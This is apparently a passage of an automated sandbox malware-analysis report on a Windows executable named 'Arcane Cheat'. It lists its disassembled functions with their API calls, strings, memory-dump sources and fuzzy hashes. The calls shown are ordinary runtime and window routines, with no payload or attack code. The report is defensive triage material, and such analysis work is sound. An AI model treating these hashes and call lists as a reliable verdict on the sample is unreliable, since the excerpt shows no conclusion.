                                  • API String ID:
                                  • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                  • Instruction ID: d21186a79da188a81a5920ee73f382eb5152d5c1973ced65bfb2c23db56daf23
                                  • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                                  • Instruction Fuzzy Hash: FC7127706043495FDB28DE28C8D0BAD77A0FFE0308F40092DE9C6CB682DA749A8587D6
                                  Function 0084473A Relevance: .2, Instructions: 214COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                  • Instruction ID: 878a7c0fe40f4b3fdbe5cba65f365cb79a097ef28f5e699c5e5cdeec86063a69
                                  • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                                  • Instruction Fuzzy Hash: 8D517D70600B8C57DB348A6C8895BBF6BC9FB53308F28252AE982D7283D715DD479352
                                  Function 0082DE6C Relevance: .2, Instructions: 190COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 26651ae3226f27431c603dceb97c6a84875ec91897beaeab10c23fdfb0a6e702
                                  • Instruction ID: c9abf7e2506fe41807879c2a3f7f81978e185e1df9d50d5cdb4d1f2eb122016f
                                  • Opcode Fuzzy Hash: 26651ae3226f27431c603dceb97c6a84875ec91897beaeab10c23fdfb0a6e702
                                  • Instruction Fuzzy Hash: 73819F8121D6E49DC7068F7D38A43B53EA1B733344F1A20BAC4C6C62A3D5BA45A8D766
                                  Function 0082E8A0 Relevance: .2, Instructions: 154COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c818484defa87b7d7718f048a7c412ec8405cb17168b5f856da188469c17b19
                                  • Instruction ID: 44a82eba5f247eddce6354d19fd607a20b5b945b1fe65d370e61b2d0e755aa3d
                                  • Opcode Fuzzy Hash: 6c818484defa87b7d7718f048a7c412ec8405cb17168b5f856da188469c17b19
                                  • Instruction Fuzzy Hash: A851A2715083E58EC712CF28A18446EBFE1FEEA314F49499EE4D58B212D26096C9CB97
                                  Function 0082F968 Relevance: .1, Instructions: 131COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff9f80534f756be9920108a0a01cd85fcd869cd6d9461456f003d77da895bafe
                                  • Instruction ID: 9c2330d17daf88aa2928ef4a58e49718adbe0706bb64b1c679db496cb387a4be
                                  • Opcode Fuzzy Hash: ff9f80534f756be9920108a0a01cd85fcd869cd6d9461456f003d77da895bafe
                                  • Instruction Fuzzy Hash: 43514671A083158BC748CF19E48059AF7E1FFC8354F058A2EE889E7741DB34E999CB96
                                  Function 008337C1 Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                  • Instruction ID: 0ef017425b7052411a27cbadab46fa21154f92a0ba1727338a455b80d1b27d7d
                                  • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                                  • Instruction Fuzzy Hash: 9B31D0B16047598FCB18DF28C85126ABBE0FB95304F10492DE4D5C7742C739EA89CB92
                                  Function 00825F3C Relevance: .1, Instructions: 76COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 43f0b4b50e988f904daf229e006ef6b485e218ee2b869dc92f87957f3fe231a2
                                  • Instruction ID: b58997f81feb0507ab5de1c1a30b44980fe354e424bbda1ca5426022aaa4b838
                                  • Opcode Fuzzy Hash: 43f0b4b50e988f904daf229e006ef6b485e218ee2b869dc92f87957f3fe231a2
                                  • Instruction Fuzzy Hash: 4521D772A202714BCB48CF2DEDD183A7755F78A312746812BEA46DB2D1C538E965CBA0
                                  Function 0082DA98 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 236COMMON
                                  Download Yara Rule
                                  APIs
                                  • _swprintf.LIBCMT ref: 0082DABE
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                    • Part of subcall function 00831596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00860EE8,00000200,0082D202,00000000,?,00000050,00860EE8), ref: 008315B3
                                  • _strlen.LIBCMT ref: 0082DADF
                                  • SetDlgItemTextW.USER32(?,0085E154,?), ref: 0082DB3F
                                  • GetWindowRect.USER32(?,?), ref: 0082DB79
                                  • GetClientRect.USER32(?,?), ref: 0082DB85
                                  • GetWindowLongW.USER32(?,000000F0), ref: 0082DC25
                                  • GetWindowRect.USER32(?,?), ref: 0082DC52
                                  • SetWindowTextW.USER32(?,?), ref: 0082DC95
                                  • GetSystemMetrics.USER32(00000008), ref: 0082DC9D
                                  • GetWindow.USER32(?,00000005), ref: 0082DCA8
                                  • GetWindowRect.USER32(00000000,?), ref: 0082DCD5
                                  • GetWindow.USER32(00000000,00000002), ref: 0082DD47
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                  • String ID: $%s:$CAPTION$d
                                  • API String ID: 2407758923-2512411981
                                  • Opcode ID: a03951730c9f35c9a39e8be1016479fe8af386c80cd6dece7dac5d785615eadd
                                  • Instruction ID: 3158c478128e92a4ee1ae9a2d9e64e3f46d8dc81c14a8fe5535cfd6597456bff
                                  • Opcode Fuzzy Hash: a03951730c9f35c9a39e8be1016479fe8af386c80cd6dece7dac5d785615eadd
                                  • Instruction Fuzzy Hash: 1681AE72108311AFD710DFA8DD89E6BBBE9FB88704F04091DFA84E3291D674E949CB52
                                  Function 0084C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • ___free_lconv_mon.LIBCMT ref: 0084C277
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE2F
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE41
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE53
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE65
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE77
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE89
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BE9B
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BEAD
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BEBF
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BED1
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BEE3
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BEF5
                                    • Part of subcall function 0084BE12: _free.LIBCMT ref: 0084BF07
                                  • _free.LIBCMT ref: 0084C26C
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 0084C28E
                                  • _free.LIBCMT ref: 0084C2A3
                                  • _free.LIBCMT ref: 0084C2AE
                                  • _free.LIBCMT ref: 0084C2D0
                                  • _free.LIBCMT ref: 0084C2E3
                                  • _free.LIBCMT ref: 0084C2F1
                                  • _free.LIBCMT ref: 0084C2FC
                                  • _free.LIBCMT ref: 0084C334
                                  • _free.LIBCMT ref: 0084C33B
                                  • _free.LIBCMT ref: 0084C358
                                  • _free.LIBCMT ref: 0084C370
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                  • String ID:
                                  • API String ID: 161543041-0
                                  • Opcode ID: 279815418fb8211b3d4e4130ca069bdd11643ce8b837a7dd174122b86e2f1cd2
                                  • Instruction ID: c661e761582d06d499836dc4a3eac57b9083029830362eea7acb13ed426f69ee
                                  • Opcode Fuzzy Hash: 279815418fb8211b3d4e4130ca069bdd11643ce8b837a7dd174122b86e2f1cd2
                                  • Instruction Fuzzy Hash: 30318B32A0120EDFEB60AE7CD945B9AB3E9FF00310F10846AE448D7651DFB1AD408B25
                                  Function 0083CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetWindow.USER32(?,00000005), ref: 0083CD51
                                  • GetClassNameW.USER32(00000000,?,00000800), ref: 0083CD7D
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0083CD99
                                  • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0083CDB0
                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 0083CDC4
                                  • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0083CDED
                                  • DeleteObject.GDI32(00000000), ref: 0083CDF4
                                  • GetWindow.USER32(00000000,00000002), ref: 0083CDFD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                  • String ID: STATIC
                                  • API String ID: 3820355801-1882779555
                                  • Opcode ID: e23398dfbe2b4448d1103e24eee0c42c1dc83d76578ee1051a33c514b437eb89
                                  • Instruction ID: ccaa8bb8103f02c4d54a2366dbb5584f87669786091de4d4576a44ef2dd4f148
                                  • Opcode Fuzzy Hash: e23398dfbe2b4448d1103e24eee0c42c1dc83d76578ee1051a33c514b437eb89
                                  • Instruction Fuzzy Hash: F81124321407117BE7206B68DC0EFAF369CFF80B41F004420FA42F10D2CAA4891587E2
                                  Function 00848EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                  Download Yara Rule
                                  APIs
                                  • _free.LIBCMT ref: 00848EC5
                                    • Part of subcall function 008484DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?), ref: 008484F4
                                    • Part of subcall function 008484DE: GetLastError.KERNEL32(?,?,0084BFA7,?,00000000,?,00000000,?,0084BFCE,?,00000007,?,?,0084C3CB,?,?), ref: 00848506
                                  • _free.LIBCMT ref: 00848ED1
                                  • _free.LIBCMT ref: 00848EDC
                                  • _free.LIBCMT ref: 00848EE7
                                  • _free.LIBCMT ref: 00848EF2
                                  • _free.LIBCMT ref: 00848EFD
                                  • _free.LIBCMT ref: 00848F08
                                  • _free.LIBCMT ref: 00848F13
                                  • _free.LIBCMT ref: 00848F1E
                                  • _free.LIBCMT ref: 00848F2C
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: _free$ErrorFreeHeapLast
                                  • String ID:
                                  • API String ID: 776569668-0
                                  • Opcode ID: ee1deb601b233c52c3ae1c9ba02a9fcdc0bc5b50852dc1679b271bbf62d6f94b
                                  • Instruction ID: 420836036229a622f804f77c1f9d988bfd73d2893e250c3469614fe57492deee
                                  • Opcode Fuzzy Hash: ee1deb601b233c52c3ae1c9ba02a9fcdc0bc5b50852dc1679b271bbf62d6f94b
                                  • Instruction Fuzzy Hash: 1211A27690010DEFCB11EF98C842CDE3BA5FF04350B5180E5BA088B626DA31EB519F86
                                  Function 00822162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ;%u$x%u$xc%u
                                  • API String ID: 0-2277559157
                                  • Opcode ID: da7858ec71a079cda61ce0d7e79d07b392d149171d43332bc66de572abef3aae
                                  • Instruction ID: 3ef955062ab0ad50f6cc9e49abb913cc4f16ad67a259ce08783dc03e784e72b3
                                  • Opcode Fuzzy Hash: da7858ec71a079cda61ce0d7e79d07b392d149171d43332bc66de572abef3aae
                                  • Instruction Fuzzy Hash: B7F1E6716082606BDB15EE28A895BFE7795FFA0300F08456DFD85CB283DA6499C4C7A3
                                  Function 0083ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0082130B: GetDlgItem.USER32(00000000,00003021), ref: 0082134F
                                    • Part of subcall function 0082130B: SetWindowTextW.USER32(00000000,008535B4), ref: 00821365
                                  • EndDialog.USER32(?,00000001), ref: 0083AD20
                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0083AD47
                                  • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0083AD60
                                  • SetWindowTextW.USER32(?,?), ref: 0083AD71
                                  • GetDlgItem.USER32(?,00000065), ref: 0083AD7A
                                  • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0083AD8E
                                  • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0083ADA4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: MessageSend$Item$TextWindow$Dialog
                                  • String ID: LICENSEDLG
                                  • API String ID: 3214253823-2177901306
                                  • Opcode ID: 9219484d1dfc69071bf428454f8fead6a81524a34326a3e0ce80c9a1bf3ddf21
                                  • Instruction ID: 63500b76a3a8f421c97a0ea66fea9a0714ae9d0a29af2e4e5abfe533c2dc7040
                                  • Opcode Fuzzy Hash: 9219484d1dfc69071bf428454f8fead6a81524a34326a3e0ce80c9a1bf3ddf21
                                  • Instruction Fuzzy Hash: 1F21F731240104BBE2265F39ED4DE3B3B6CFB8AB46F010414F684E64E0DB66A900D773
                                  Function 00829443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00829448
                                  • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 0082946B
                                  • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 0082948A
                                    • Part of subcall function 008317AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0082BB05,00000000,.exe,?,?,00000800,?,?,008385DF,?), ref: 008317C2
                                  • _swprintf.LIBCMT ref: 00829526
                                    • Part of subcall function 0082400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0082401D
                                  • MoveFileW.KERNEL32(?,?), ref: 00829595
                                  • MoveFileW.KERNEL32(?,?), ref: 008295D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                  • String ID: rtmp%d
                                  • API String ID: 2111052971-3303766350
                                  • Opcode ID: 996dcc4f6856e87af34b8547f5ae9aaa90444dd227933c22a3c4edbce5c9994c
                                  • Instruction ID: bfd2573cebddd45bfb91c4472624b61f889dde1c06a285be0f4d81d884613733
                                  • Opcode Fuzzy Hash: 996dcc4f6856e87af34b8547f5ae9aaa90444dd227933c22a3c4edbce5c9994c
                                  • Instruction Fuzzy Hash: 60414171901268A6CF21EB64AC85ADE73BCFF55380F0444E5F589E3142EB748BC9CB65
                                  Function 00830A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • __aulldiv.LIBCMT ref: 00830A9D
                                    • Part of subcall function 0082ACF5: GetVersionExW.KERNEL32(?), ref: 0082AD1A
                                  • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00830AC0
                                  • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00830AD2
                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00830AE3
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00830AF3
                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00830B03
                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00830B3D
                                  • __aullrem.LIBCMT ref: 00830BCB
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.1732479560.0000000000821000.00000020.00000001.01000000.00000008.sdmp, Offset: 00820000, based on PE: true
                                  • Associated: 00000003.00000002.1732451379.0000000000820000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732519930.0000000000853000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.000000000085E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000864000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732547491.0000000000881000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000003.00000002.1732618648.0000000000882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_820000_Arcane Cheat.jbxd
                                  Similarity
                                  • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                  • String ID:
                                  • API String ID: 1247370737-0
                                  • Opcode ID: 0f473d3bcd3b300d093d3211435fff3fb3668330d32d6351d69ed0ab447e9fab
                                  • Instruction ID: 58fe1c336e019600cf303e4881df05feb2299d77c4bdce988a3b8304b9c52a1f
                                  • Opcode Fuzzy Hash: 0f473d3bcd3b300d093d3211435fff3fb3668330d32d6351d69ed0ab447e9fab
